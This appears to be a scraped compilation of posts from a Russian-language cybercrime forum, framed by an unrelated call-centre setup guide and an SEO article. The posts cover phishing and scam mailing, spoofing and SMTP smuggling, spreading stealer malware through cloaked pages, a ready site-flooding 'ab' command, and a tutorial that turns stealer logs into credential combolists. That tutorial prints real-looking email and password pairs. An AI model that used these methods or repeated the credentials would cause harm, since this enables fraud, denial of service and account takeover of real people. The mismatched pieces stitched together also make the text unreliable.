1. Define your business model: Determine the type of services that you will offer, such as customer support, sales, or telemarketing. You should also decide on the size of your call center, the number of agents you plan to hire, and the hours of operation.
2. Create a business plan: Develop a business plan that outlines your goals, strategies, and financial projections. This plan should include details about your target market, competition, marketing strategies, and operations.
3. Choose a cloud-based call center software: Select a cloud-based call center software that fits your needs and budget. This software should provide features such as call routing, IVR, call recording, reporting, and analytics.
4. Hire and train agents: Recruit and hire agents who have the necessary skills and experience for your call center. You can find agents through job postings, referrals, or online platforms. Train your agents on your company policies, procedures, and customer service skills.
5. Set up a virtual office: Establish a virtual office that allows your agents to work from home. This may include providing them with a computer, headset, and high-speed internet connection. You should also set up a virtual private network (VPN) to secure the data transmission.
6. Launch your call center: Once your agents are trained and your software is set up, you can launch your call center. Monitor your performance metrics, such as call volume, wait time, and customer satisfaction, and make adjustments as necessary.
By following these steps, you can set up a low-cost work-from-home call center that provides quality services to your customers while keeping your overhead costs low.
PM me if you have more questions
Что, что ещё произошло?
Сколько времени прошло?
Ты не едешь, не звонишь, не пишешь
Да, может быть, твоё письмо
Затерялось, не дошло
Напиши ещё разок, ты слышишь? (С)Click to expand...
Всем доброго времени суток, господа почтальоны. Подскажите пожалуйста советом
В наличии имеются домены приобретенные на nameчип (да плашку видел, не
откажусь от другого хостера где есть us.org и криптой оплата) - вместе с ними
приобретен пакет днс , и мыло приватемэйл, дали ультимейт тариф.
Вроде бы всё хорошо начиналось , нашел почты, провел валидацию, отсортировал
по мх , растасовал, прогрел, включил thunderbird и поехали. Хавок делает тук
тук порой. Иногда даже в ответ пишут, спрашивают как пэйлоад запустить, почему
не запускается на макбуке. Ну что я могу поделать, ничего - молчал в ответ.
В первую пробную кампанию на неймчипе настройки днс (mx dmarc dkim записи
большинство) для мыла были ручные, сейчас по клику настраиваются.
Вручную они были ... TXT Record @ v=spf1 a include:spf.privateemail.com ~all
Automatic (тут как раз подписываю все серваки айпишники неймчипа, мол разрешаю
им высылать)
Прогрев я делал руками (как умел) - писал туда сюда , отвечал, добавлял в
избранные , убирал со спама.
Но недавно нашел триал прогрев от Snov.io - там жпт пишет текст и себе
отвечат, + делает собственно тот же функционал вышеописанный. Там и
обнаружилась диллема
По https://www.mail-tester.com результат 10/10 все ему нравится и айпи нигде
не в бане мол, с которых попадается выслать . иногда где то мелькает какой то
конечно.
Но жмыло категорически отказывается принимать my letters! Как мне кажется
gmail отгородился от всех и требует чтобы все пользовались его смпт. Ну чтож
... Нас это не устраивает! Еще вчера инбокс жмыла был 0 - но сегодня 1% -
доверие растет.
Собственно вопрос . Почему я не в инбоксе жмыла ? НИКАКИХ АТАЧЕЙ НЕТ. Только
ссылка чистая как слеза. Есть версии - использую неймчип с его мх записями
почтовыми серверами - они у гугла все в тотальном бане. Вторая версия надо
растить доверие - ждать и надеятся. Цель кампании не массовая рассылка -
суммарное количество целей укладывается в несколько к, может десяток к для
каждого домена.
Перед тем как все это писать я разумеется изучил форум и прочитал статью по
настройке и поднятии селфхост почты на примере вестасп, хестиасп, киберпанель
и конечно https://xss.is/threads/94155 от TROUBLE
(спасибо) , от aelsа статьи и вообще тут ребят много кто шарит сидит. Поэтому
и пишу)
Стоит ли отказываться от простоты и удобства и даже частичного норм
инбокса(серверов приватмэйла) и поднимать на своей впс/вдс сервак почтовый
сервер постфикс , exim. Настроить и привазять его на неймчипе. Не окажется ли
что греть его выйдет дольше и менее профитно , чем например отбомбить пару
кампаний без жмыла, я как слышал корпы все на аутлуке (?)
Для рассылки использую Thunderbird и плагин
https://addons.thunderbird.net/en-US/thunderbird/addon/send-later-3/ хотя
есть амс и прочие классные штучки по типу СSA (спасибо форуму) , но их еще не
использовал. Стоит ли переходить на Амс, к слову?
Ну и бими есть ли резон делать? я в первую кампанию прикрутил, не помню чтобы
куда то он прилетал , хотя все сделал по мануалам - тесты показали ок . Видимо
его надо верифицировать
Далее по спуфингу - вчера вышла интересная статья
[https://labs.guard.io/echospoofing-...ends_link&sk=be24847e3c700e7ba99e158ac1deaf62](https://labs.guard.io/echospoofing-
a-massive-phishing-campaign-exploiting-proofpoints-email-protection-to-
dispatch-3dd6b5417db6?source=friends_link&sk=be24847e3c700e7ba99e158ac1deaf62)
о том как Микки Маус слал письма с диснея ТОННАМИ. Во всем виноват Proofpoint
его мх записи, аутлук и какой нибудь разраб которого уволят. Использование
пруфпоинта только одна часть. Да и подобных сервисов немало как знаю Mimecast,
Barracudа, Cisco Email Security, Symantec, Forcepoint ,Trend Micro и тд .
Может они так же умеют подыгрывать?
Ноги веротяно растут от -> <https://sec-consult.com/blog/detail/smtp-
smuggling-spoofing-e-mails-worldwide/>
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F3285c7a4dad54af1b484ed362d224d267c5f85a7871937b9ef0e8554417ab3d4%2FThe- Login%2FSMTP-Smuggling- Tools&hash=48b2da15ff7e43025ed09db1f65647f6&return_error=1)
smuggling vulnerabilities. ](https://github.com/The-Login/SMTP-Smuggling- Tools)
Tools for finding SMTP smuggling vulnerabilities. Contribute to The- Login/SMTP-Smuggling-Tools development by creating an account on GitHub.
github.com
https://blog.slonser.info/posts/email-attacks/ - товарищ слонсер недавно
нашел еще у майков в аутлуке возможность спуфинга , но как и полагается белому
и честному - никому о ней деталей не сообщил
На данный момент ни разу руки не дошли ни до одного скрипта , но интерес
имеется( а может ну его CSA и брут лучше, зачем подменять когда можно
овладеть). Я немного даже подшаманил пэйлоады /r /n эти добавил возможнных
вариаций ,но не проверял опять же)
https://github.com/stars/hastalamuerte/lists/mail cделал небольшую подборку,
может кому пригодится.
Есть ли у кого успехи в данном направлении?
Всем стабильного инбокса!
я спросил несколько парней лс но я думаю, будет лучше, если кто-нибудь захочет узнать, может поискать эту статью
я начал трафик на ютуб 2 недели назад, с новым акаунтом, добавлял 2–3 тыс. и около 50–100 комментариев к каждому видео(около 5-6 видео, лил 1 видос в день,затем делал накрутку каждый день) , лайки приходили сами по себе за просмотры, но ютуб банил мой канал через 1 неделю. и Логи не так уж и много для счастья Я понял, что это было слишком много, и теперь я думаю начать снова с 0 с 200-450 просмотров в день и 10 комментариями каждый день. что бы вы порекомендовали из своего опыта, сколько Логов я могу получить в среднем из ютуба для, например, инвестиций в 50 долларов, покупка подписчиков, не думаю, что это поможет, или покупка канала
я думаю, ключ к трафику в новых тонкостей ютуба
также знаю о юхаб но не совсем понимаю, что он делает (не могу найти настоящую
телегу),будет полезен или нет
в общем, хотел послушать несколько советов от гораздо более опытных, если не
секрет конечно
накрутку делал в - Ytmonster, smmlite
ytmonster- все сделано реальными людьми, а не ботами, поставить клиент на дедике> большое количество баллов > дополнительное накрутка бесплатно
smmlite - можете делать работу реальными людьми, услуг слишком много и цены норм
ребята, подскажите, ситуация следующая:
нужно делать рассылку руками на фиш, примерно 400-600 писем в день.
слать буду с gmail+куки по контактам и в ответных письмах, отправлять буду
html письмо с картинками.
нужны ли редиректы или можно отправлять прямой линк на фиш?
нужно ли клоачить фиш?
лимиты есть какие-нибудь у gmail на отправку писем по контакам (чтобы письма
без алертов доходили адресатам)?
Доброго времени суток, появился вопрос, что выбрать MAILSensey или PMTA?
А так же хороша ли партнерская программа losPollos? буду благодарен за ответ.
Всем привет. Я новичок и хочу попробовать себя в спаме, но инфы настолько много, что начал теряться. Есть какие либо лучшие практики? Например что лучше использовать - поднимать свой smtp сервер на каком нибудь впс с нуля(со всеми почтовыми настройками, фильтрами и тд - что по моему для каждой отправки гемор и дорого) или возможно есть какие то инструменты с помощью которых можно развернуть всю инфру и уже ковырять конфиги для нужной настройки?
Так же благодарен если расскажите про подводные камни в этой нише. И любую общую инфу (на что лучше обратить внимание) о том куда лучше всего лить трафик, способы его добычи? Какие партнерки есть и где их искать?
Интересуюсь почтовой рассылкой, но и про другие рассылки тоже будет интересно узнать. Всем заранее спасибо
Как вы грузите андройд? Интересует при каких обстоятельствах люди охотно устанавливают апк? Мало того что для установки требуется много кликать и знать андройд на уровне разработчика так еще и файл дропается хрен знает куда... Как вы решаете данную задачу?
Всем привет, столкнулся с необходимостью сбора корп мыл для большого количества таргетов. Подскажите сервис, можно платный, но с возможностью оплаты криптой
Запустил рекламу в фейсбуке сделал такой креатив, + видео инструкцию, 15000 просмотров, указал возраст 24 -38 мужщини, интереси крипта, инвестиции. 0 заинтересованих клиентов! не ужели мамонт вимер ? как работать в етом направлении? Может кто поделится полезной инфой?
Если понравилась книжка - не забудьте приобрести ее в издательстве.
You must have at least 5 reaction(s) to view the content.
Всем доброго дня. Уже какую неделю ломаю себе голову на что ещё можно чекать
логи.
Список из того, на что проверяю сейчас:
- Холодные
- FB (скупают по 1$ пустышки и 10$ за спенды).
- YT
Различные запросы по типу amazon, gpay уже пробовал чекать. Как не зашлешь
пачку из 40-50 логов - человеку вечно все не подходит.
Банки тоже не все подходят, хоть объемами выгружай. У всех проблемы на
отработке банков.
Трафик идет преимущественно на взрослую аудиторию, без игровых тематик и
запросов.
Буду максимально признателен, если кто-то подкинет идей.
Со вчерашнего дня ютуб начал удалять видосы с сумасшедшей скоростью. Лью видос, сразу кручу сео и бан в тесении 10 минут "за мошенничество и нарушение правил". Лью софт, удалил слово crack из названия и описания. Перебирал видео руками в видеоредакторе, обрезал сменил музыку положил шумы. Если пару дней назад ютуб удалял в течении суток, сейчас это происходит практически мгновенно, как это обойти , если ктото подскажет буду очень благодарен
Доброго времени суток Уважаемые.
Хотелось бы узнать,стоит ли нынче лезть в арбитраж ФБ и Google,с целью крипто
трафика ?
Интересно как работают сейчас движки,после запрета в РФ
Если есть знающие люди,буду благодарен
Для тех кто недавно занимается этой темой пусть тут и таких очень мало, есть простой вариант как положить сайт (без антиддос защиты) с помощью апача.
Установка его в Debian систему: sudo apt-get install apache2-utils
Перед тем как выполнить одну просую команду,чуть расскажу вам про метод.Суть в том что Апач будет запускать то количество соеденений, которое вы укажете и будет их удерживать по keep-alive.В логах будет отображен Google bot.Однако это не означает безнаказанность этого метода.По крайней мере этого достаточно чтобы сайтец лег на короткий промежуток времени.
Пример команды:**ab -n 100000 -c 1000 -r -k -H "User-Agent: Google Bot" **
Где -n количество отправляемых запросов,-c парамертр, который определяет
количество параллельных запросов отправляемых одновременно. -H заголовок
запроса.
Советую всем попробовать,хотябы ради интереса.
Автор делал в Kali linux
I am looking for a free spammer for smtp servers, software that sends letters from smtp servers, maybe someone has leaked them to the Internet, or personal software that you can share for free
Приветствую всех уважаемых донов этого чудесного форума, решил что созрел для
чего то нового.
Горю желанием научиться проливать, при это всем знания на нуле, планирую
приобрести для старта какие то курсы, и попробывать проливать для начала на
белую
В тред призываются все гуру в этом деле, каждый совет будет навес золота для
меня, спасибо всем.
Hello guys today I want to share with you a simple and effective method for sorting logs, you don't need any cracked software or money.
Requirements:
- Logs from a cloud, for example today I will be using SATANICLOUD logs from
private channel.
- Ripgrep
- Files editor
Lets start:
- For finding logs is easy, you can use forums like this and many other
resources.
- Ripgrep is a powerful command-line tool that you will need for sorting your
data in a efficient and fast way, to download it you can use these commands:
Linux:
sudo apt-get install ripgrep
Click to expand...
Windows: is requested a unix based CLI like Git Bash, after installed you will
need to install Choco here: https://docs.chocolatey.org/en-us/choco/setup/
Now you can install Ripgrep on Windows using Choco:
choco install ripgrep
Click to expand...
Run "rg --version "to see if it actually worked.
- Files editor, there are a lot online, EmEditor for example.
Steps:
- Download as many archived logs you want from the resources you choose /
found.
- Extract them all in your preferred path for example / FullLogs
- Use Ripgrep for sorting the data extracted in format: U; L; P
The command you will need to use is this the following:
rg -oUNI "URL: \ s (.?) [| \ r] \ nUsername: \ s (.?) [| \ r] \ nPassword: \ s (.*?) [| \ r] \ n" -r '$ 1: $ 2: $ 3 '− glob-case-insensitive -g "Passwords.txt" > RESULT.txt
Click to expand...
This command will check for all "Passwords.txt" files contained in the folder
where there are the extracted logs, search for the entries and write them in
format ULP to file RESULT.txt
The command uses "Passwords.txt" because its the most common output from
stealers nowadays, anyway you can look through logs and see if the name is
different, most used are these below aswell:
Once the sorting process is done expect some duplicates, so run this command to successfully dedupe the result:
sort -u RESULT.txt > DEDU.txt
Click to expand...
My result below:
I started with:
- 1000 LOGS - SATANIC PRIVATE.zip
- 1100 LOGS - SATANIC PRIVATE.zip
- 1100 LOGS - SATANIC PRIVATE (2) .zip
- 1400 LOGS - SATANIC PRIVATE.zip
I finished with:
LINES: Original: 302 015 \ No duplicates: 208 515
Click to expand...
How to make combolist? Very simple, for targeted you can use grep or others to
search for lines containing specified URL, for example: "damagelab.xyz"
You use the same mechanism as above to print the target lines in a new file
for example: damagelab_target_lines.txt
Funny part comes now since is very easy, open i.e EmEditor, remove all
"https://" and / or" http://", remove android lines and urls with ports aswell
because they could mess the file.
Now we can use "cut" to remove the content in the first ':'
cut -d ':' -f2.3 damagelab_target_lines.txt
Click to expand...
Result:
aumatinaomondi@gmail.comina@2024
milimanishg23@gail.com:ganjala2023
722114532:2568
ndugumwanakaka@gmail.com:2568mikeA011078602Ihebeast55
Click to expand...
Since they are stealer logs' lines, is very high the amount of lines with
duplicates because of credentials reuse, so run again "sort -u"
For non targeted combolist you do the same without parsing the wanted lines.
My result for combolist non targeted:
146 655 unique
Click to expand...
If you want to keep only lines in format email: pass, use this grep / ripgrep
with regex to keep only lines with email.
Result:
vivienapsel@gmx.de:Ladykracher2014
vophuhung35345@gmail.com:12abcd34
gvidasrankaus@gmail.com:jify8GX8gpd7suH
bbcsissy666@gmail.com:dlxFG5X4pp
dangi0435@gmail.com:Sandeep@1234
ancuta_antonia@yahoo.com:Ankutza06@199
mafnan500@gmail.com:F-yRCdFV!n9Rhc *Click to expand...
Want to check how many unique emails there are in the email: pass? run this:
grep -oE '\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b 'file.txt | sort -u | wc -l
Click to expand...
Would be great to hear your feedback below this thread, hope it helped :3
Надо платежная система с поддержек гривны, как ее забабахать?
can we do sms phising just like email one?like cracking smtp with tools then using them and blasting mail to victims inbox
Доброго времени суток.
Подскажите пожалуйста, как правильнее и безопаснее можно грузить с ленда
стиллер? Тематика сайта миксер бтк, пользователь ничего не загружает с него -
операции производятся в вебформе... какие есть варианты на загрузку малвари
пользователем?
Заранее спасибо, камнями за, вероятнее всего, плевый вопрос - не кидаться.
Подскажите, мож поможет кто, 5 раз пытался лить в 5 разных кабинетов адса. Аки
прогретые сутки запускал рекламу пиццерий и всякой х#йни. Лью вайт с
выключеной клоакой, просто сайт с новостями типа и с ключами заголовками и
описаниями блека, 10-15 мин и бан за обход системы, я бл#ть не пойму в чем
проблема просто пиздец
ключи все нейтральные тоесть например photoshop - ключи у меня видеоредактор и
тд тоесть не упоминаю слова фри, скачать или имя компании
Ваша учетная запись заблокирована. Ваша учетная запись нарушила политику
обхода систем - и на всех 5 аках так, знающие люди, подскажите пожалуйста что
делать
Привет, кто знает подскажите пожалуйста биржу где можно пушей заказать, хотим стиллер пролить. Просто в основном по ютубу работали, пока особо в арбитраже по лендингам не разбираемся. Залез на евадав там депозит 100 баксов надо, пока нет такой суммы(
Всем добра! Ищу человека, который льёт гугл используя СС (для обмена инфой).
Мой опыт 5 лет, много знаю, много умею, работаю в настоящем времени, основное
гео USA, аки спендят 300$+.
ТГ в ЛС кому интересно обменяться инфой.
P.S. Покупать ничего не буду.
Есть ли актуальный, что предложите?
You must have at least 5 reaction(s) to view the content.
Хочу спросить совет как лучше всего пролить траф
Тематика : Персональные тренировки, фитнес марафоны
Хочу лить черный траф с фб (инста) и адвордс на лендинг
Как это сделать грамотно, чтобы основной аккаунт инсты не улетел в бан
You must have at least 77 reaction(s) to view the content.
Готов выслушать дельные советы на тему трафика на сайт, если вам не жаль своего времени на разъяснение полному нулю, приму так же ссылки на полезные утелиты для достижения успеха в накрутке трафика. Так же, если вы свободны и способны предоставить свои услуги по данной части работы, за плату, готов вас выслушать в лс. Прошу помочь, даже скромным текстом разясняющим по мелочи вы сможете это сделать, пока только начал интересоваться данной темой, важна каждая информация. Возможно вы знаете то, чего я не смог найти на открытых источниках. Всем спасибо, прошу ограничить меня от занудства и высокомерия, если вы не способны помочь.
Хочу запустить свой поток логов, что для этого нужно? какие темы сейчас наиболее актуальные? Буду крайне благодарен каждому совету
There are 3 times that all the videos I post on YouTube are deleted
All videos are unique and not copies
Does anyone know where the problem is?
I worked for several months without this problem
подскажите кто знает актуал сервисы вирт карт с бинами которые лезут в бинг адс
Добрый день, возник вопрос, через какие сервисы/почты лучше всего спамить на gmail, при том, что присутствует рандом текста, темы и т.д. Хотелось бы выслушать какие то советы/рекомендации. Раньше использовал польский почтовый сервис wp.pl, летело 200/200 в Inbox без спама, но лазейку пофиксили.
i am facing trouble since last few days with the downloads/logs on my stealer,
here is my workflow
1. I use keitaro with white black page.
2. I use hide.click api integrated in keitaro
so after the ad gets approved i switch to black landing in keitaro and for
bots white landing (added with filters)
In my black landing i added the download button with magicchecker clocker so
the person when clicks on download button they goto magic checker clocker
indexpage and if bot then goes to white page and if real then it downloads my
file which is exe inside zip.
So since last few days i have wasted alot of money in traffic exchanges i get
around 50k-100k + clicks with average spend of $50-150 with tracking of
download, so to track the download and protect from bots i added magiccheck in
the download button so that bots gets filtered.
But after following up all these things i am still not able to get the
installs in my panel people downloads the files like if 400-500 people
download the file then i get around 2-5 installs.
about crypt my crypt is runtime clean i tested manually in VM, VDS, VPS, and
real pc with Fully updated Win10, Win11 (home,pro,enterprise), i spread the
crypt in zip and even after getting 50k clicks the zip does not gets blocked
by chrome, file is runtime clean, domain is good and page good no redwarning
at all.
Looking for expert who can provide a good solution for my this problem
Ищу знающего человека, который сможет обучить меня Facebook Ads
Мне не нужен мануал. Мне нужен человек опытный и знающий, который расскажет и научит все моменты в отливе трафика и всем, что с этим связано.
Разумеется - НЕ ЗА БЕСПЛАТНО. Сумму "обучения" обговорим в ЛС
Жду ваших сообщений!
Строго через гаранта форума
PS
отпишу сразу для всех кто попробует меня наебать со своими мудацкими
магазинами логов фб со спендами и прочей х#йней - вы мне неинтересны и у вас
ничего не получится. Также ребята работающие с Google Ads меня на данный
момент не интересуют, строго Facebook Ads. Если вы не в состоянии
предоставить скриншоты своих отливов с рк - тоже прошу не беспокоить.
which is the best vps in order to host the admin panel of a botnet and carry out the works on it,
I started sending out sms spam and realized that getting your own leads is the best way to get fresh reliable complete and banking logs for any software or any videos on how to do it please.
Всем привет, direct-to-mx это еще актуально?
насколько я понял ботнет сети таким образом делают свои рассылки, в том числе Emotet (поправьте если ошибаюсь).
Тестирую локально отправку - всегда попадаю в спам. "Delivered" header вроде как подменить нельзя, провайдер почты его перезаписывает.
Есть знания и опыт, но несколько лет этим не занимался, не знаю, что сейчас актуально.
База: 10к почт, есть имена, 70% gmail, база отчищена и верифицирована
Письмо: крипто скам, ссылка на развод, не фишинг(не используется известное
название)
Цель: максимальный инбокс от своего домена/доменов
По ссылке в письме, пока планирую использовать 10 доменов, 1к писем на 1
домен, чтобы снизить рисков с красной страницей на домен.
Каким методом лучше всего такое сейчась слать?
Есть возможность лить траф с ют, еу юса ру азия любое гео. Потестил, видосы
набирают, люди есть. Пока еще не так мертво как с тт.
Можно лить всякое разное...
Куда в принципе можно сейчас сливать траф? На тг каналы, а потом куда? На шопы
какие-то?
Раньше лил фишинги онли с тт. Тт умер, появился ют.
Знаю недавно лили на онлифанс, но как по мне это мусор. И тема уже не сильно актуальна даже для тех у кого были хорошие резы. Но куда лучше всего сейчас отправлять адалт трафик?
Какие существуют сервисы которые эффективно инбоксят в 2024 году, учитывая, что Seznam сдох, который ранее работал хорошо, теперь не подходит? И, кроме того, какие из них предоставляют возможность настройки редиректа ответов на доменную почту?
Всем привет. Столкнулся с такой проблемой : пока улучшал методы работы фиша европейского банка его ключи добавили в Блэк. Может кто подскажет пути решения или поможет ключи подобрать ? Вложено много в проект и не могу просто так его оставить. Пишите в лс , название банка там укажу. Благодарю за внимание.
Например если зайти на https://duckduckgo.com и проведем поиск с ключем "faceless" мы получаем фишинг с доменом "https://facelees.cc"
Приглашаю к сотрудничеству професионалов своего ремесла.
Приветствую, для реги в одной пп требуют скрины статы. Может кто поделиться? Буду очень благодарен.
Всем привет!
Ребят подскажите почтовый сервис у которого работает spoofer,желательно
зарубежный,заранее благодарен.
While I am less busy and not having any time taking project at hand I would
like to use my spare time to answer some questions as much as I could in
regards to spamming office or corps logs, email and pass etc.
Drop me the questions.
_Мануал по клоакингу Tik-Tok Ads через Keitaro _
Максимально информативный гайд показывает простой способ настройки кло в Кейтаро
Всем привет! Сегодня поговорим о том, как можно создать трастовый Google Ads аккаунт через сервер Shopify.
Логинимся в профиле антидетекта в Google аккаунт
Далее, переходим на главную страницу сайта Shopify и регистрируемся
На следующей странице и на всех последующих, нажимаем кнопку «Skip »
Дальше выбираем страну, которая соответствует вашему прокси (В нашем случае USA)
На следующем шаге логинимся по кнопке Google
После того как попали на главную страницу Shopify нам необходимо выбрать план
(Триальный 30 дней)
Добавляем адрес и платежные данные (тут нам понадобится карта которую в дальнейшем будем вязать к Google Ads) адрес можно взять сделав запрос в google поиск. К примеру : «los angeles shop»
Выбираем на карте любой магазин и получаем реальный адрес и zip код
После того как заполнили все данные нажимаем «Start Plan »
Выбираем Google or Bing и жмем «Submit »
Далее, нажимаем на строку поиска и выбираем там Google
Устанавливаем приложение Google channel
После того как мы добавили Google channel в наш Shopify, перейдем к его настройке и подключению
После авторизации нам необходимой пройтись по всем шагам, которые нам
предлагают и выполнить все условия
Удаляем пароль, убрав галочку с данного пункта
Добавляем политики нажав на кнопку генерации шаблонов во всех окнах где это можно сделать
После того как выполнили все шаги переходим по ссылке в наш Google Merchant Center для его настройки
Нажимаем «Verify & claim website»
Для подтверждения выбираем Google Analytics
Открываем новую вкладку в браузере и переходим на сайт Google Аналитики https://analytics.google.com/analytics и нажимаем Start
Заполняем данные
Обязательно, включаем галочку
Берем наш шопифай домен и вставляем в Google
Тут, все ставим на ваш вкус
Жмем сюда
И копируем Universal Analytics идентификатор
Далее, переходим в настройки нашего магазина и вставляем скопированный ранее идентификатор в поле для ввода и нажимаем «Save »
После возвращаемся в Google Merchant Center и нажимаем «Verify »
После верификации домена нажимаем «Claim website »
Далее возвращаемся на страницу подключения Google в Shopify и подтверждаем телефон
После того как все сделали ждем пока подтвердится наш Merchant Center
Как только подтвердили наш Google аккаунт соглашаемся с правилами и жмем «Complete setup »
Далее, переходим во вкладку «Setting » и создаем аккаунт Google Ads
Переходим по кнопке «Finish Setup » для привязки платежных данных в Google Ads. Лучше всего использовать ту же карту, которую вы привязали к Shopify
Также через интерфейс Shopify можно создать прогревочную кампанию
Если по каким-то причинам ваш аккаунт ушел в бан, то в 50% случаев такие аккаунты автоматически выходят из бана через 1-2 суток. Ну и писать апелляции на созданных через Shopify аккаунтах намного продуктивнее.
Удачи!
[отсюда](https://telegra.ph/Cozdanie-trastovogo-Google-Ads-akkaunt-cherez- server-Shopify-09-20)
Всем привет, есть какие-то проверенные способы спама до 100 человек дейли
чтобы 100% попасть в инбокс?
В спаме 0 опыта, буду рад за инфу или в какую сторону копать.
В целом спам с одним текстом но 50% уникальным текстом.
И будет ли идти рассылка если создать новый акк допустим тот же гугл, или сразу в спам будет идти? так-как подозрительно что новый пользователь и сразу куча отправленных
Внешняя оптимизация / стратегия ссылочного продвижения
Внешние факторы
Внешние факторы — сигналы которые поисковая система извлекает уже не из нашего
сайта, а из сторонних ресурсов. Но это информация о нашем сайте или компании.
Разделим внешние факторы на три основных группы:
Самый простой сигнал, ему обычно уделяют меньше всего внимания из-за его малой эффективности. Изменение количество упоминаний весьма слабо влияет на позиция сайта. Упоминая — это наличие нашего домена на других ресурсах.
Click to expand...
Быстро проверить количество упоминаний можно с помощью команды
«domen.com» -site:domen.com
И здесь мы увидим все упоминания интересующего нас сайта на других ресурсах. В последнее время, поисковая система смотрит не сколько на упоминания, сколько за структурированными упоминаниями.
Структурированные упоминания — это не только наличие информации о нашем сайте, но и какая-то информация о нашей компаний. То есть от туда могут быть извлечены какие либо структурированные данные. Например: отзывы или рейтинги, обязательно размеченные микродатой.
Поисковая система воспринимает структурированные упоминания под каждую тематику по разному, например под информационный сайт — упоминания толком вообще ничего не дадут, а вот под коммерческий сайты, особенно это касается регионального бизнеса— вполне.
Из выше написанного вытекает вопрос
Как быть, если сайт молодой и про нас еще нет никаких отзывов?
С помощью команды «domen.com» -site:domen.com анализирует выдачу конкурента, и смотрим на каких площадках о нем оставляются отзывы. Собираем пул и регистрируемся на них далее у нас два варианта
Вариант А : Накрутить отзывы
Вариант B : Взаимодействовать с клиентами и провоцировать их на оставления отзывов — в хорошем смысле.
Думаю, что уже все догадались, что социальные сигналы — это сигналы связанные с социальными сетями. Стоит учитывать, что репорсты, лайки и комментарии сами по себе никак не отражаются на росте позиций, но косвенно они связанны с генерацией трафика. Трафиковые факторы максимально простые в понимании — чем больше посещаемость на сайт, тем больше ему можно доверять. По этому продвигать новые и маленькие сайты с мизерным трафиком весьма трудно.
Трафик которые приносят соц.сети — крайне положительный фактор. Сайты которые находятся в топе, чаще всего имеют несколько источников трафика. Поэтому подключение SMM на этом этапе очень занимательная мысль. Остановимся на этой идеи подробней.
Лучшим трафиком с социальных сетей является органический трафик. То есть, трафик не с таргетированной рекламы, а прямые переходы с постов в органике. Поисковая система вообще якобы не очень сильно оценивает трафик с таргетированной рекламы, но на практике складывается впечатление, что у поисковой системы не совсем это получается. Ставили опыты, и тестировали таргетированную рекламу на сайт — результат, страницы быстрее индексировались и росли позиции. Важный момент, любой трафик должен оставлять хорошие поведенческие.
Сразу отметим, что контекстная реклама не дает никаких + для seo.
Ко всему выше сказанному еще добавлю такие вещи как ретаргетинг , ремаркетинг — это когда реклама гоняется за пользователем и прайс агрегаторы — если работаем с интернет магазином, добавляем свои товары в прайс агрегаторы типо яндекс маркета.
Стоит упомянуть еще про одну возможность, а именно: Разметка Open Graph
Open Graph — это набор тегов которые формирует социальный сниппет. Так как я непосредственно сам работаю с smm , очень люблю эту разметку, выглядит красиво, но на практике толку от нее в seo особо нет. Держите весьма примитивный пример.
Самый весомый внешний фактор. Сеошники очень любят ссылочные факторы. Чтобы понять как все это работает, рассмотрим 3 базовых алгоритма.
**1. Алгоритм PageRank — авторитет
**
Мы уже говорили об этом алгоритме подробно, теперь же выделим лишь основную суть.
Click to expand...
С появлением алгоритма PageRank ссылки начали учитываться как рекомендации , и на основе этого у поисковой системы появилась возможность рассчитать рекомендательный вес. Рекомендательный вес — это показатель вероятности пребывания пользователя на странице. Поисковая система пытается рассчитать шанс пребывания пользователя на странице в контексте если люди ходят только по ссылкам. Логика простая, если допустим нет поисковой системы, а есть только ссылки, то каким образом человек попадет на интересующий его сайт? Естественно ему его кто-то должен посоветовать, собственно это и есть рекомендация, и есть суть алгоритма pagerank.
Рассчитать Pagerank достаточно просто, все патенты открыты и в общем доступе. Ручками считать конечно мы не будем, да и учиться применять формулы нет смысла. Есть куча сервисов которые все это сделают за нас.
Что важно понять из pagerank?
Важно не количество ссылок, а вероятность, что по этим ссылкам человек попадет на нашу страницу, давайте разберемся на примере:
Cравним страницу E со страницей C , у страницы E 6 ссылок, в то время как у страницы С 1 ссылка и все же страница С больше страницы E , почему? Все просто, источник единственной ссылки на страницу C более авторитетней чем все вместе взятые входящие ссылки на страницу E.
Вывод: важно не только количество ссылок, а так же авторитетность источника.
Поэтому одна ссылка с одного хорошего источника может дать больший эффект, чем 30 ссылок с мелких и ничтожных источников.
Идем дальше. Итак, мы выяснили, что ссылки дают нам вес. И теперь мы можем двигать этот вес, собственно это и есть продвижение. Когда мы работаем внутри сайта, мы занимаемся оптимизацией — улучшаем ее в надежде, что поисковая система заметит улучшения и начнет лучше к нам относится. И она будет лучше к нам относится, даст нам почетное 15 место и скажет: «Оля-ля, друг, вот твое место, сиди здесь», но нас же это не устраивает, и тогда мы можем усилить страницу ссылками, тем самым увеличить ее ссылочный рейтинг и за счет этого спровоцировать ее дальнейший рост в позициях.
2. Алгоритм Hits — региональный и тематический рейтинг.
Вообще hits похож чем то на pagerank, но немножко отличается.
Click to expand...
Давайте разберемся с этой разницей. Классический Pagerank не зависит от тематики, и ему не важно вообще от куда идет ссылка. Главное, что ссылка есть и она передает вес. Создатели Hits решили подойти с другого конца, а конкретно они поставили вопрос: «А зачем нам знать какая страница самая авторитетная во всем интернете?» Это нам не нужно, нам нужно знать какая страница самая авторитетная в определённой тематике или в определенном регионе. Логика hits следующая:
В самом начале формирует корневой набор. Корневой набор — это пул страниц
посвящённой одной теме или принадлежащие к одному региону. Потом этот
корневой набор расширяется до базового набора. Базовый набор — это страницы
которые посвящены не только выбранной теме, но и страницы которые связанные с
этой темой.
Давайте рассмотрим на примере: есть сайты тематики продвижения сайтов —
корневой набор, далее этот корневой набор расширяется до базового и вбирает в
себя такие сайты сопутствующие теме, например какие-нибудь сервисы которые не
являются тематическими, но часто ссылающиеся на сайты корневого набора.
Базовый набор уже содержит в себе не только тематические сайты, но и сайты которые на них ссылаются и так же получаются обратные ссылки с стороны корневого множества. На основе этого базового набора считается рейтинг и вычисляется какая страница среди всех, была самая рейтинговая. Такой подход позволяется поисковой системе рассчитывать **тематический и региональный рейтинг.
3. Анкорная реливантность**
Здесь работает все по следующей аналогии — поисковая система смотрит с какими словами пользователи ссылаются на нашу страницу. Анкорный текст выглядит вот так : О анкорной реливантности ([https://uspei.com/seo-prodvizhenie-...-takoe- i-zachem-on-nuzhen-poiskovym-sistemam/](https://uspei.com/seo-prodvizhenie- sajta/relevantnyj-ankornyj-tekst-chto-eto-takoe-i-zachem-on-nuzhen-poiskovym- sistemam/)).
Поисковая система собирает анкорные тексты ссылок и отправляет в свою базу данных. С собранной информации поисковая система анализирует какие слова содержаться в ссылках на странице и в каком количестве.
